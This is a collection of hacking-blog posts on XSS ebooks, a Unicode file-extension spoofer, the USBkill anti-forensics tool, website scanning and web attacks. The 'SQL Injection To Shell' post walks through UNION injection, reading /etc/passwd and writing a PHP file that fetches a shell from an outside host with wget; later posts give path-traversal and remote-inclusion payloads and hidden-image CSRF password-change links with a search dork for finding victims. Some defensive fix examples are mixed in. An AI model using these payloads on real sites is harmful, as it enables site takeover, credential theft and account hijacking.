
COLLECTION OF ADVANCE XSS EBOOKS

    by Maya Badmash

    Hello everyone,

    It's been a long time since I posted anything on my blog, so I'm just giving away my premium collection of XSS ebooks, everything about XSS.

    I have this collection on my PC and want to share it here.

    This collection contains:
    • Advanced XSS
    • Alexander Sotirov Blackbox Reversing of XSS filters
    • Cross Site Scripting Attacks XSS, Exploits and Defense
    • DOM Based Cross Site Scripting or XSS of the Third Kind
    • XSS Cross Site Scripting
    • XSS Evolution
    Click on the download link below to download the collection of advanced XSS ebooks.

    Click here to download: Click Me
    Sorry for the 5-10 second ads.

    IT Security Beginner: Certified Hacking Training

    by Maya Badmash

    This course is ideal for everyone, regardless of their skills and expertise. The arrangement and presentation of learning resources will let both novices and more advanced students broaden their knowledge of IT security.

    The training starts with current IT security threats and trends. Afterwards we discuss popular security myths. A great part of the training relates to network security.

    We will start with local networks and talk about protocols and their vulnerabilities. You will learn how to design secure computer networks and subnets. You will become a real network administrator.

    Next you will discover why wireless networks can be so dangerous. You will learn standards, protocols and security solutions. Wi-Fi networks are an integral part of our lives, but not everyone realises that if a network is inadequately protected, your enterprise or home network can disclose your confidential passwords and give attackers easy access to the machines you're administering.

    Topics covered include core issues related to effectively securing the most popular Microsoft OS: identity theft, authentication, authorisation, encryption. We identify typical mistakes and guide you towards achieving good OS protection.

    What are the requirements?
    • General IT knowledge
    • No programming skills needed for the IT Sec Beginner course

    What am I going to get from this course?
    • Over 25 lectures and 7 hours of content!
    • IT security trends.
    • Security myths.
    • Learn about Wi-Fi network standards and protection.
    • Get to know about Wi-Fi threats.
    • Improve your grasp on Windows security.
    • Understand what security boundaries are.
    • Find out how to fight malware.
    • Discover secret tips on access control in Windows.
    • Learn how Windows authentication works.
    • Prevent identity spoofing.
    • Find out the mechanisms of Windows authorisation.
    • Learn about Windows 7 security mechanisms.
    • Get to know how to encrypt data in Windows.
    • Wi-Fi network standards and protection.
    • Wi-Fi network threats.
    • How to prevent identity spoofing.

    Download


    Direct Link: 


    EXTENSION SPOOFER

    by Maya Badmash

    Heyo!
    I've developed a simple extension spoofer. It inserts the Unicode character U+202E at the beginning of the file name, which inverts the character order and lets you write at the end of the extension.
    It's a command line tool so there is no GUI.


    It requires Java 8 to run.
    It'll look weird if the file is put inside an archive, so I recommend doing the archive spoof as well. Just search for it.

    Run the program as:

    Code:
    java -jar extension_spoofer.jar [FILE_PATH]

    If you're on Windows you can also execute the batch file.

    Download HERE.

    Please leave some feedback!

    USBkill - Turns USB Drives Into PC Killing Weapon

    by Maya Badmash

    Here's news that will cheer up activists, criminals and whistleblowers: they now have a new tool called USBkill to protect themselves by shutting down the computer before the sensitive information on it can be examined.
    USBkill turns your USB drive into a kill switch once activated. It's a program, a piece of code that will disable the computer if there is any activity at the USB ports. This weapon can be kept on a USB drive and attached to computers holding sensitive information.
    Hephaestos, the programmer who wrote the USBkill script, describes USBkill as an anti-forensic USB tool. He says that it will be of the utmost importance in case the police bust your bunker or steal your laptop: USBkill waits for a change at the USB ports and then immediately kills your computer. He writes:
    The police will use a mouse jiggler to keep the screensaver and sleep mode from activating. If this happens you would like your computer to shut down immediately. Additionally, you may use a cord to attach a USB key to your wrist. Then insert the key into your computer and start USBkill. If they then steal your computer, the USB will be removed and the computer shuts down immediately.
    If the police catch you, you would want your PC to shut down immediately. He advises users to tie the USB drive to their wrist so that USBkill triggers instantly when the drive is pulled out as the cops knock down your door.
    He adds that users must use full disk encryption; otherwise law enforcement agencies will have their party anyway.
    It's an unfinished work that Hephaestos intends to improve, but it does work effectively.
    See the USBkill code here on GitHub: USBkill on GitHub

    A Complete Guide To Securing A Website

    by Maya Badmash

    To secure a website or a web application, one has to first understand the target application, how it works and the scope behind it. Ideally, the penetration tester should have some basic knowledge of programming and scripting languages, and also of web security.
    A website security audit usually consists of two steps. Most of the time, the first step is to launch an automated scan. Afterwards, depending on the results and the website's complexity, a manual penetration test follows. To properly complete both the automated and manual audits, a number of tools are available to simplify the process and make it efficient from the business point of view. Automated tools help the user make sure the whole website is properly crawled, and that no input or parameter is left unchecked. Automated web vulnerability scanners also help in finding a high percentage of the technical vulnerabilities, and give you a very good overview of the website's structure and security status. Thanks to automated scanners, you can have a better overview and understanding of the target website, which eases the manual penetration testing process.
    For the manual security audit, one should also have a number of tools to ease the process, such as tools to launch fuzzing tests, tools to edit HTTP requests and review HTTP responses, proxy to analyse the traffic and so on.
    In this white paper we explain in detail how to do a complete website security audit and focus on using the right approach and tools. We describe the whole process of securing a website in an easy-to-read, step-by-step format: what needs to be done prior to launching an automated website vulnerability scan, up to the manual penetration testing phase.
    1. Manual assessment of the target website or web application

    Securing a website or a web application with an automated web vulnerability scanner can be a straightforward and productive process, if all the necessary pre-scan tasks and procedures are taken care of. Depending on the size and complexity of the web application structure, launching an automated web security scan with typical 'out of the box' settings may lead to a number of false positives, wasted time and frustration.
    Even though web vulnerability scanning technology has improved in recent years, a good web vulnerability scanner sometimes needs to be pre-configured. Web vulnerability scanners are designed to scan a wide variety of complex custom-made web applications. Therefore, most of the time one needs to fine-tune the scanner to his or her needs to achieve the desired, correct scan results.
    Before launching any kind of automated security scanning process, a manual assessment of the target website needs to be performed. It is a well known fact that an automated scanner will scan every entry point in your website, including those you have most likely forgotten about, and test it for a wide variety of vulnerabilities.
    During the manual assessment, familiarize yourself with the website topology and architecture. Keep a record of the number of pages and files present in the website, and of the directory and file structure. If you have access to the website's root directory and source code, take your time to get to know it. If not, you can manually hover over the links throughout the website. This process will help you understand the structure of the URLs. Also, take note of all the submission forms and other types of online forms available on the website.
    During the pre-scan manual assessment, apart from getting used to the directory structure and number of files, get to know what web technology was used to develop the target website, e.g. .NET or PHP. There are a number of vulnerabilities which are specific to different types of technology. Other details you should look out for when manually assessing a website are:
    • Does the website require client certificates to be accessed?
    • Is the target website using a backend database?  If yes, what type of database is it?
    • Is the database server running on the same server as the website?
    • Are all the sensitive records being encrypted?
    • Are there any URL parameters or URL rewrite rules being used for site navigation?
    • When a non-existing URL is requested, does the web server return an HTTP status code 404, or does it return a custom error page and respond with an HTTP status code 200?
    • Are there any particular input forms or one time entry forms (such as CAPTCHA and Single Sign on forms) that need user input during an automated scan?
    • Are there any password protected sections in the website?
    Once the manual assessment process is complete, you should know enough about the target website to determine whether the website was properly crawled by the automated black box scanner before a scan is launched. If the website is not crawled properly, i.e. the scanner is unable to crawl some parts or parameters of the website, the whole point of securing the website is invalidated. The manual assessment will go a long way towards heading off invalid scans and false positives. It will also help you get more familiar with the website itself, and that's the best way to help you configure the automated scanner to cover and check the entire website.
    2. Get familiar with the software
    Although many automated web vulnerability scanners have a comfortable GUI, if you are new to web security you might get confused by the number of options and technical terms you'll encounter when trying to use a black box scanner. But do not give up; it is not rocket science. Commercial black box scanners are backed by professional support departments, so make sure you use them. You can also find a good amount of information and how-tos about the product you are using online. There are a good number of open source solutions as well, but most of the time you have to dig deep and paddle on your own in rough waters to find support for such solutions. Many commercial software companies are also using social networks to make it easier for you to get to know more about their product, how it works and best practices on how you should use it.
    3. Configuring the automated black box scanner

    Once you're familiar with the automated black box scanner you will be using, and the target website or web application you will be scanning, it is time to get down to business and get your hands dirty. To start off with, one must first configure the scanner. The most crucial things you should configure in the scanner before launching any automated process are:
    • Custom 404 pages – if the server returns HTTP status code 200 when a non-existing URL is requested.
    • URL rewrite rules – if the website uses search-engine-friendly URLs, configure these rules to help the scanner understand the website structure so it can crawl it properly.
    • Login sequences – if parts of the website are password protected and you would like the scanner to scan them, record a login sequence to train the scanner to automatically log in to the password-protected section, crawl it and scan it.
    • Mark pages which need manual intervention – if the website contains pages which require the user to enter a one-time value when accessed, such as a CAPTCHA, mark these pages as needing manual intervention, so that during the crawling process the scanner will prompt you to enter such values.
    • Submission forms – if you would like the scanner to use specific details each time a particular form is crawled, configure the scanner with those details. Nowadays scanners make this easy by populating the fields automatically (such as in Acunetix WVS).
    • Scanner filters – use the scanner filters to specify a file, file type or directory which you would like excluded from the scan. You can also exclude specific parameters.

    4. Protect your data

    From time to time I have noticed people complaining that web vulnerability scanners are too invasive, and therefore opting not to run them against their website. This is a bad presumption and the wrong solution, because if an automated web vulnerability scanner can break your website, imagine what a malicious user can do. The solution is to start securing your website and make sure it can properly handle an automated scan.
    To start off with, automated web vulnerability scanners tend to perform invasive scans against the target website, since they try to input data which the website has not been designed to handle. If an automated vulnerability scanner is not invasive against a target website, then it is not really checking for all vulnerabilities and is not doing an in-depth security check. Such security checks can and will lead to a number of unwanted results, such as deleted database records, changes to a blog's theme, garbage posts placed on your forum, a huge number of emails in your mailbox and, even worse, a non-functional website. This is expected, because, just as a malicious user would, the automated black box scanner will try its best to find security holes in your website and will try to find ways to get unauthorized access.

    Therefore it is imperative that such scans are not launched against live servers. Ideally a replica of the live environment should be created in a test lab, so that if something goes wrong, only the replica is affected. If a test lab is not available, make sure you have the latest backups, so that if something goes wrong the live website can be restored and be functional again in the shortest time possible.
    5. Launching the scan

    Once the manual website analysis is complete and the black box scanner is configured, we are ready to launch the automated scan. If time permits, you should first run a crawl of the website, so that once the crawl is finished you can confirm that all the files in the website and all input parameters have been crawled by the scanner. Once you confirm that all the files are crawled, you can safely proceed with the automated scan.
    6. After the scan – Analysing the results

    Once the automated security scan is complete, you already have a good overview of your website's security level. Look into the details of every reported vulnerability and make sure you have all the information required to fix it. A typical black box scanner such as Acunetix Web Vulnerability Scanner will report a good amount of detail about each discovered vulnerability, such as the HTTP request and response headers, the HTML response, a description of the vulnerability and a number of web links where you can learn more about the reported vulnerability and how to fix it.

    If AcuSensor Technology (Acunetix WVS) is enabled, much more debug information is reported; the line of code which leads to the reported vulnerability, SQL stack trace in case of SQL injection etc.
    Analysing the automated scan results in detail will also help you better understand the way the web application works and how the input parameters are used, thus giving you an idea of what type of tests to launch in the manual penetration test and which parameters to target.
    7. Manual penetration test

    There are a number of advantages in using a commercial black box security scanner such as Acunetix Web Vulnerability Scanner. Apart from benefiting from professional support and official documentation, it also includes a number of advanced manual penetration testing tools. Having all the web penetration testing tools available in a centralized web security solution has the advantage that all the tools support importing and exporting data from one to the other, which you will definitely need. It also helps with manually analyzing the scan results: the automated scan results can be exported to the manual tools so you can look further into the issues.

    As much as the automated scan, the manual penetration test is a very important step in securing a website. If the advanced manual penetration testing tools are used properly, they can ease the manual penetration test process and help you be more efficient. The manual penetration test helps you audit your website and check for logical vulnerabilities. Even though automated scans can hint at such vulnerabilities and help you pinpoint them, most of them can only be discovered and verified manually.
    7.b. Below are two examples of logical vulnerabilities

    While auditing a shopping cart, you notice that if you manually set the price parameter to 0 in the checkout request, the customer can get the product for free without being asked for payment details.
    Or imagine an online ads company promotes a new campaign: create an online account, buy $100 worth of ads and they will give you an extra $100 worth of ads for free. During the development stage, the developers should make some kind of check statement like the following:
    IF new account AND deposits $100 THEN give $100
    If the developers forgot the AND clause, then upon opening an account, and without the need to purchase $50 worth of adverts, you will still get your $100 worth of free ads.
    One might think that such logical vulnerabilities are very remote, or that they are a joke, but we do encounter them when analysing production web applications.  Such vulnerabilities are typically discovered by using several manual penetration testing tools together, like the HTTP Sniffer to analyze the application logic, and then the HTTP Editor to build HTTP requests, send them and analyze the server response.
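The two logic flaws above come down to the server trusting a client-supplied value (the price) or skipping one condition of a rule (the deposit). The following is an added example, not part of the white paper, showing how a checkout and a promotion handler enforce both rules on the server side; the catalogue, prices and account fields are constructed for the demonstration.

```python
# Added example (not from the white paper): server-side checks for the two
# logic flaws described above. Catalogue, prices and amounts are constructed.
from dataclasses import dataclass

# Constructed catalogue: the server, not the client, is the source of prices.
CATALOG = {"widget": 25.00, "gizmo": 40.00}


def checkout_total(request):
    """Compute the amount to charge from the server-side catalogue.

    A 'price' field supplied by the client is ignored entirely; the shop only
    trusts the product id and the quantity, and validates both.
    """
    product = request.get("product")
    if product not in CATALOG:
        raise ValueError("unknown product")
    qty = request.get("qty", 1)
    if not isinstance(qty, int) or qty < 1:
        raise ValueError("invalid quantity")
    return CATALOG[product] * qty


@dataclass
class Account:
    is_new: bool
    deposited: float = 0.0
    promo_credited: bool = False


def apply_promo(account, deposit):
    """Credit the $100 bonus only when every condition of the campaign holds.

    Implements 'IF new account AND deposits $100 THEN give $100': the bonus is
    granted once, only to a new account, and only after $100 has really been
    deposited. Dropping the AND would hand out the bonus on account creation.
    """
    if deposit <= 0:
        raise ValueError("deposit must be positive")
    account.deposited += deposit
    bonus = 0.0
    if account.is_new and account.deposited >= 100 and not account.promo_credited:
        bonus = 100.0
        account.promo_credited = True
    return bonus


def promo_sequence(is_new, deposits):
    """Replay a list of deposits on one account and return the bonus per deposit."""
    account = Account(is_new=is_new)
    return [apply_promo(account, amount) for amount in deposits]
```

Note that `checkout_total` never reads the `price` key at all, so a tampered checkout request with `price=0` still charges the catalogue price; that is the property a manual test of the checkout request should confirm.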

    Conclusion
    As we can see from the above, web security is very different from network security. As a concept, network security can be simplified to "allow the good guys in and block the bad guys." Web security is different; it is much more than that. But never give up. There are tools available out there which will automate most of the job for you, assist you and make the whole process easier and faster.

    Download this white paper as PDF.

    SQL Injection To Shell

    by Maya Badmash

    Hello Everyone,

    Today, I'm going to show you how to upload a shell through SQL injection (no admin panel needed).

    I usually use this method to upload a shell, but it's not easy to find a website on which this method works.

    Requirements:

    • Vulnerable site.
    • Shell in txt format [Example: http://[site].com/shell.txt].
    • Your Brain (;
    ~~~
    Firstly, we need to use the ORDER BY statement to count the number of columns.

    http://[site].com/index.php?id=1+order+by+1-- [TRUE]
    http://[site].com/index.php?id=1+order+by+2-- [TRUE]
    http://[site].com/index.php?id=1+order+by+3-- [TRUE]
    http://[site].com/index.php?id=1+order+by+4-- [*FALSE*]

    So far so good. Now we use the UNION SELECT statement:

    http://[site].com/index.php?id=-1+UNION+SELECT+1,2,3--

    Let's say that our vulnerable column is: 2, so:

    http://[site].com/index.php?id=-1+UNION+SELECT+1,user,3+FROM+mysql.user--

    And --> voilà! The MySQL user is: Josh (for example).
    But now we need the full site path.

    Let's continue

    http://[site].com/index.php?id=-1+UNION+SELECT+1,load_file('/etc/passwd'),3--

    You can see the full path in the passwd file.
    As you can see, I got the full path! There are many methods to find the full path.

    [Example of a full path: /home/domain/public_html/]

    What you should do now is use the INTO OUTFILE statement.
    Example:

    http://[site].com/index.php?id=-1+UNION+SELECT+1,2,3+INTO+OUTFILE+"/home/domain/public_html/test_permission.txt"--

    Now, if the page loads normally (i.e. the returned value is TRUE), we have write access. If not, just look for another directory to write to until you get a TRUE value and the page loads normally.

    OK, now I will try to upload the shell! :)
    Watch and learn:

    http://[site].com/index.php?id=-1+UNION+SELECT+1,"<?php system('wget http://othersite.com/shell.txt -O shell.php'); ?>",3+INTO+OUTFILE+"/home/domain/public_html/login_here_to_upload_shell.php"--

    Then just go to login_here_to_upload_shell.php and, when it finishes loading, go to shell.php and... tada!
    You shelled the website :)

    If the system() function is disabled, you can try:

    • exec();
    • shell_exec();
    • file_put_contents();
    • fopen(); / fwrite();
    There are more tricks. Enjoy!

    Web Application Hacking - Behind The Scenes

    by Maya Badmash

    Table of Contents

    • Introduction
    • MySQL injection
      ▸ How does MySQL injection work?
      ▸ How do our malicious queries get executed?
    • Cross Site Scripting
      ▸ How does Cross Site Scripting work?
      ▸ How do our malicious vectors get executed?
    • File inclusion
      ▸ How does Local & Remote File Inclusion work?
      ▸ How do we exploit file inclusion vulnerabilities?
    • Epilogue

    Introduction

    Ever wanted to understand how your attacks worked rather than using your attacks without understanding? Then this tutorial is just for you.
    This tutorial was created for the sole purpose of helping to educate the users of this community, as I don't think all of you truly understand what is actually going on behind the scenes.
    For those who wish to know how and why these common attacks work instead of using third party programs to do the work for you, or blatantly use attacks with no knowledge of how they work, then continue to read this thread.
    I am not responsible for what you use this for, this is for educational purposes only.

    MySQL injection

    How does MySQL injection work?

    MySQL injection works because programmers do not properly sanitize user input: values submitted by unauthorized users are placed into MySQL queries without being escaped.
    MySQL injection vulnerabilities are usually exploited by entering MySQL syntax into a page's GET parameter. If you do not know what a GET parameter is, here is an example:

    PHP Code:
    <?php

    $page_id = $_GET['id'];

    ?>

    http://site.com/article.php?id=12

    Take notice of the 12 at the end of the URL: it is the value of our GET parameter "id".
    Even though it is commonly exploited via GET parameters, it is not limited to them.

    How do our malicious queries get executed?

    MySQL queries are usually exploited by modifying the current query, usually blocking off the currently functioning query and adding your own to spit out information or to get around insecure login scripts.
    For example this is a snippet of a PHP script that is vulnerable to MySQL injection:

    PHP Code:
    <?php

    $user = $_POST['username'];
    $password = $_POST['password'];

    $query = mysql_query("SELECT * FROM users WHERE username = '$user' AND password = '$password'");

    ?>

    To get a better understanding of how it works, I will dissect the code for you as best as I can.

    $user, $password
    These are variables that store a value to make it easier to bring up the contents of that value in the future, whether it be a number, a string etc.

    $_POST['username'], $_POST['password']
    These are the values that were stored within our $user and $password variables.
    Do you remember I was talking about GET? There are two different types of parameters that can be used to send the data. You can either use GET or POST.
    The difference between them is that GET's value can be viewed in the URL, whereas POST's value is sent in the request body and does not appear in the URL.

    mysql_query("SELECT * FROM users WHERE username = '$user' AND password = '$password'");
    mysql_query() is a built-in PHP function that executes a MySQL query. The text inside the parentheses of our mysql_query() call is the query that will be executed.

    So we know our query is SELECT * FROM users WHERE username = '$user' AND password = '$password', so how do we exploit it?

    A lot of you may know of the good ol' ' or '1'='1, correct?
    I will be using that to demonstrate how to bypass insecure login scripts.

    PHP Code:
    <?php

    $user = $_POST['username'];   // We submitted ' or '1'='1 as our username.
    $password = $_POST['password'];   // We submitted ' or '1'='1 as our password also.

    mysql_query("SELECT * FROM users WHERE username = '$user' AND password = '$password'");

    ?>

    We have just successfully exploited an insecure login script, but how did it work? What was the output?

    PHP Code:
    SELECT * FROM users WHERE username = '' or '1'='1' AND password = '' or '1'='1'-- 

    Still don't understand? We closed off the quoted string where it was asking for the username and password: username = '' or '1'='1' (it's the same for the password).
    We are basically saying: if the username equals nothing or 1 is equal to 1, then proceed. The condition on the username is true, so it proceeds.
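To see the bypass happen and, more importantly, what stops it, here is an added example that is not part of the tutorial. It rebuilds the login query from the PHP snippet two ways in Python against an in-memory SQLite table (a constructed `users` table with one account): once by pasting the submitted values into the SQL text, as the snippet does, and once as a parameterised query. The `' or '1'='1` input from above is the constructed test input.

```python
# Added example (not from the tutorial): the login query built two ways, run
# against an in-memory SQLite database with a constructed users table.
import sqlite3


def make_db():
    """Create a throwaway database with one constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Constructed sample account; a real application would store a password hash.
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return conn


def login_vulnerable(conn, user, password):
    """Mirrors the PHP snippet: the submitted values are pasted into the SQL
    text, so a quote in the input terminates the string literal and the rest
    of the input becomes part of the WHERE clause."""
    query = ("SELECT * FROM users WHERE username = '%s' AND password = '%s'"
             % (user, password))
    return conn.execute(query).fetchone() is not None


def login_safe(conn, user, password):
    """Parameterised query: the driver sends the values separately from the
    SQL text, so the input is compared as data and can never alter the query."""
    query = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (user, password)).fetchone() is not None


# The input discussed above, used here as a constructed test value.
PAYLOAD = "' or '1'='1"
```

With the payload in both fields the vulnerable version runs `... username = '' or '1'='1' AND password = '' or '1'='1'` and returns the `alice` row; the parameterised version looks for a user literally named `' or '1'='1` and finds nothing. The same change, moving from string-built queries to bound parameters (prepared statements in PHP's mysqli or PDO), is the fix for the snippet on this page.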

    Cross Site Scripting

    How does Cross Site Scripting work?

    Cross Site Scripting works because programmers fail to sanitize user input, just as I explained in the MySQL injection section of this tutorial.
    Cross Site Scripting enables a remote user to inject client-side script into a webpage, generally, for the best effect, into a GET parameter as stated before.
    I will not go through what a GET parameter is again, if you forget then scroll back up to the MySQL injection section of this tutorial.


    How do our malicious vectors get executed?

    Cross Site Scripting vectors usually get executed by adding on to the page's already functioning output. Cross Site Scripting can lead to a full OS compromise if you know how to apply your knowledge of programming.
    For example this is a snippet of a PHP script that is vulnerable to Cross Site Scripting:

    PHP Code:
    <html>

    <form method="GET">
    <input type="text" name="keywords" /> <input type="submit" name="search" />
    </form>

    </html>

    <!-- End of HTML -->

    <?php

    $input = $_GET['keywords'];

    if($input)
      echo $input;

    ?>

    I'll assume you do not understand what this means, once again I shall dissect the code so you can understand. However, I will leave out what I have already covered.

    <form method="GET"></form>
    A form created to contain the input fields, using the GET method, so its values are sent as GET parameters.

    <input type="text" name="keywords" /> <input type="submit" name="search" />
    We have two types of input fields, type "text" and type "submit". Type "text" is pretty self-explanatory, it allows you to input text into a text box and type "submit" allows you to submit that text.
    We have named the input box (type text) "keywords" which is how we define the name of the GET parameter containing the value of our input.

    if($input)
    echo $input;
    This checks whether our GET parameter (keywords) has been set. If it has, it prints out the user input. It does not sanitize the input, so any HTML or script we enter is rendered as code by the browser.
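The following is an added example, not from the tutorial, that reproduces the `echo $input` step in Python and places it next to the escaped version. The `<script>` string used as input is a constructed test value; the function names are mine.

```python
# Added example (not from the tutorial): the search page's echo done two ways.
import html


def render_search_vulnerable(keywords):
    """Mirrors the PHP snippet: the parameter is echoed into the page as-is,
    so markup or script in the value becomes part of the document."""
    return "<p>You searched for: " + keywords + "</p>"


def render_search_safe(keywords):
    """Escapes &, <, >, " and ' before the value reaches the HTML body, so the
    browser shows the text instead of interpreting it."""
    return "<p>You searched for: " + html.escape(keywords, quote=True) + "</p>"


def render_attribute_safe(keywords):
    """Reflecting the value back into the search box needs a quoted attribute
    plus escaping of the quotes; otherwise a quote in the input closes the
    attribute and whatever follows becomes a new attribute."""
    return ('<input type="text" name="keywords" value="%s" />'
            % html.escape(keywords, quote=True))


# Constructed test input: the classic probe string, not a real attack.
CONSTRUCTED_VECTOR = "<script>alert(1)</script>"
```

Escaping must match the output context: `html.escape` is right for element content and quoted attribute values, while a value placed inside a `<script>` block or a URL needs a different encoder. In PHP the equivalent of `render_search_safe` is `htmlspecialchars($input, ENT_QUOTES)`.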



    File inclusion

    How does Local & Remote File Inclusion work?

    File inclusion is possible because, once again, programmers do not sanitize user input.
    Once again, generally exploited through GET parameters but not limited to them. A lot of them are usually done by POST parameters as well.
    File inclusion works by including a file in a webpage, whether from an internal or an external source. We generally include files such as /etc/passwd or /etc/shadow from the users' files to output user credentials; you can also include /proc/self/environ to include your own scripts, isn't that cool? That is Local File Inclusion. As for Remote File Inclusion, generally you include a PHP shell so you can then upload your shell from within the shell included on the page, so it is actually on the server.

    How do we exploit file inclusion vulnerabilities?

    Let's start off with a PHP snippet so we can grasp what we are dealing with and how our files get included onto the webpage in the first place.

    PHP Code:
    <?php

    $page_id = $_GET['page'];
    $extension = ".php";
    $file = $page_id . $extension;

    include($file);

    ?>

    I believe that's pretty self-explanatory. I explained everything in that snippet already, excluding the include(); function.
    If you do not understand I will just explain it to save you the hassle of searching it up.

    include($file);
    We already know what the value of the variable $file contains, so all the include(); function does is attempt to include the file within the parentheses.

    So we know how files are included, so how are we going to exploit the vulnerable file?
    I'll be using /etc/passwd for this Local File Inclusion example.
    For example, this is the site we wish to include a local file and output it onto the webpage:

    http://site.com/index.php?page=articles.php

    To exploit this we will include /etc/passwd instead of articles.php.

    http://site.com/index.php?page=../../../etc/passwd%00

    Don't understand? Here is an explanation.

    ../../../
    Each ../ moves up one directory, to the parent, so we move up three levels since we have used three.
    Let's say for example that the file path was the following.
    /var/www/billy
    We have moved up past /var/ to the directory above it, the root of the filesystem.
    So we are accessing a directory that not even the web administrator should be able to access, unless he was using his own web hosting.

    /etc/passwd
    The /etc/passwd file contains the login credentials of all the users who are able to access Billy's directory.

    %00
    This is called a "null byte" and we are using this because the file extension .php is in the way of our inclusion.
    Without the null byte our inclusion would look like the following:

    http://site.com/index.php?page=../../../etc/passwd.php

    The file extension (.php) will not show up in the URL; however, the script appends it, so the include looks like the following and you will get an inclusion error similar to this:

    PHP Code:
    Warning: include() [function.include]: Failed opening '../../../etc/passwd.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/user/public_html/test.php on line 7 

    We don't want to include a PHP file, so we need to work around that by using our null byte.

    As for Remote File Inclusion, it is pretty much the same, except that the file comes from an external server. An example would be akin to the following:

    http://site.com/index.php?page=http://mysite.com/shell.php

    Two things to keep in mind. First, because the script appends .php, the request above actually fetches http://mysite.com/shell.php.php; you can either leave the extension off (page=http://mysite.com/shell), since the script adds it for you, or end the URL with ? so that the appended .php becomes a harmless query string. Second, RFI only works when the target has allow_url_include=On in php.ini; it has defaulted to Off since PHP 5.2, so RFI is much rarer than LFI. Your own server must also hand out the shell as plain text (for example as shell.txt), otherwise your PHP runs the file instead of serving its source to the target.
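As an added example (this is not code from the original tutorial), here is the vulnerable include pattern described above next to a hardened version that maps the page parameter to a fixed allow-list and double-checks the resolved path. The page names, the pages/ directory and PHP 7.1 or newer are assumptions.

```php
<?php
// Added example, not the tutorial's own code. File names and the
// pages/ directory are assumptions.

// VULNERABLE: the user controls the whole path. ../ walks out of the web
// root, %00 (on PHP < 5.3.4) drops the appended .php, and with
// allow_url_include=On a URL is fetched and executed.
function include_page_vulnerable(string $page): void
{
    include $page . '.php';
}

// HARDENED: the request parameter is only ever a key into a fixed table,
// and the real path is built from a constant base directory.
const PAGES = [
    'home'     => 'home.php',
    'articles' => 'articles.php',
    'contact'  => 'contact.php',
];

function resolve_page(string $page, string $baseDir): ?string
{
    // Anything that is not a known key is rejected outright; this covers
    // ../, null bytes, absolute paths and http:// URLs in one check.
    if (!isset(PAGES[$page])) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$page]);
    // Defence in depth: the resolved file must still sit under $baseDir,
    // even if the table is edited carelessly later.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$page = $_GET['page'] ?? 'home';
$path = resolve_page($page, __DIR__ . '/pages');
if ($path === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $path;
```

With this in place a request for page=../../../etc/passwd%00 or page=http://mysite.com/shell simply gets a 404, and the server-wide settings allow_url_include=Off and open_basedir add a second layer if a different script elsewhere is written the vulnerable way.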

    Epilogue

    You have now finished reading my tutorial, hopefully it somewhat helps you in the future and allows you to get a better grasp about what is going on in the background. Knowing how things work can make a big difference when trying to attack a website.
    In my next tutorial I will cover how to prevent these attacks and secure your site against them.
    I hope you enjoyed my tutorial; thank you for reading.

    CSRF - An Enemy You Must Know

  • by
  • Maya Badmash
  • Today I'm going to explain a web vulnerability that not everyone knows about, but which is very common.
    This vulnerability is dangerous and effective.
    Exploiting it usually leaves no evidence pointing at the attacker: the forged request is sent by the victim's own browser, so the server logs show the victim's IP address and session, not yours.
    This vulnerability is called Cross-Site Request Forgery (CSRF).
    CSRF, and the way to exploit it, is extremely easy; much easier than all the complicated injections.

    How does it work?

    It works by forcing the victim's browser to send HTTP requests to a site where the victim is logged in, so that the site performs actions with the victim's privileges, for example:

    • Gaining the victim's permissions or taking over the account (changing the password or e-mail address).
    • Transferring funds out of the victim's bank account.
    • Changing the site's data or state in ways the victim never intended.
    And much more.

    Requirements for exploiting CSRF.

    • The victim must have a live session (cookie) on the target site, or
    • The victim must be authenticated at the protocol level (HTTP Authentication).
    In other words, to make the victim perform actions he is not aware of, the victim must be logged in to the target site, because the browser automatically attaches the session cookie or HTTP credentials to every request it sends to that site, including the ones we forge.

    Common forms of CSRF attacks.

    The most common trick is the image tag (img src) in an HTML document: the SRC of the image is set to a malicious link that sends the HTTP request to the target, so any action that can be triggered with a GET request is an excellent candidate. The benefits of an image tag over a normal link tag (a href) are:

    1. An image tag does not need to be clicked, whereas an A tag only sends the HTTP request when the user clicks the link.
    2. Browsers fetch visual objects (pictures) and remote resources (CSS, JS, etc.) automatically while loading the page, without asking the user. The user does not have to do anything to load the image; just visiting the page makes the browser send the HTTP request. Because the browser only sees an image tag, it sends the request even when the SRC is not really a picture but a malicious link, and it attaches the victim's cookies for the target domain to that request.

    Those of you who use Firebug (a Firefox add-on) can see in the next screenshot an example of the browser sending an HTTP request to the server to load an image while the user is logged in:
    [Image: InUNu.png]

    CSRF attacks can also be delivered by e-mail, not only through websites. Since mailboxes accept HTML-formatted messages, an embedded image looks perfectly legitimate. I can send a malicious message to a huge number of recipients with an image tag in the body whose SRC is the malicious link; when a victim opens the e-mail in a client that loads remote images, the request is sent and the action is performed. (Many mail clients block remote images until the user allows them, which limits this vector.)

    Exploiting code examples: 

    HTML
    Using an img tag (hidden, so the victim sees nothing): 

    Code:
    <img style="display:none;" src="http://targetsite.com/change_password.php?new_password=123456"> 

    Using an iframe tag:

    Code:
    <iframe src="http://targetsite.com/change_password.php?new_password=123456"></iframe> 

    JavaScript
    Using an Image object (the request is sent as soon as src is assigned; the image never has to be added to the page):

    Code:
    <script>
      var poniz = new Image();
      poniz.src = "http://targetsite.com/change_password.php?new_password=123456";
    </script> 

    Exploiting sequence

    Here is a cool example that actually belongs to Black-SEO.
    Almost everyone fills in a home page/favourite website address in their profile. What I want to check in my user control panel is which parameters are sent to the HTTP server when I update my home page via the user control panel.
    There are a variety of fields that can be updated, such as address, phone, email, name, content, and most importantly for this example, the favourite website/home page address.

    These parameters are sent to the server when I update my website address. This is how it looks in Firebug: 
    [Image: UYIgx.png]

    The parameters are sent to the server with the POST method, so we do not see them in the URL. But what if the same parameters are sent with the GET method instead; will the data still be saved? Let's see.

    Code:
    http://targetsite.com/users.php?db[webaddress]=http://www.PonizSite.com&action=save

    It works! (In the server-side PHP the values were read from $_REQUEST, which accepts both GET and POST, so it does not matter which method we use.)


    Now imagine that I create a dork like this one:

    Quote:site:targetsite.com & intext:"Homepage" & intext:"email: "

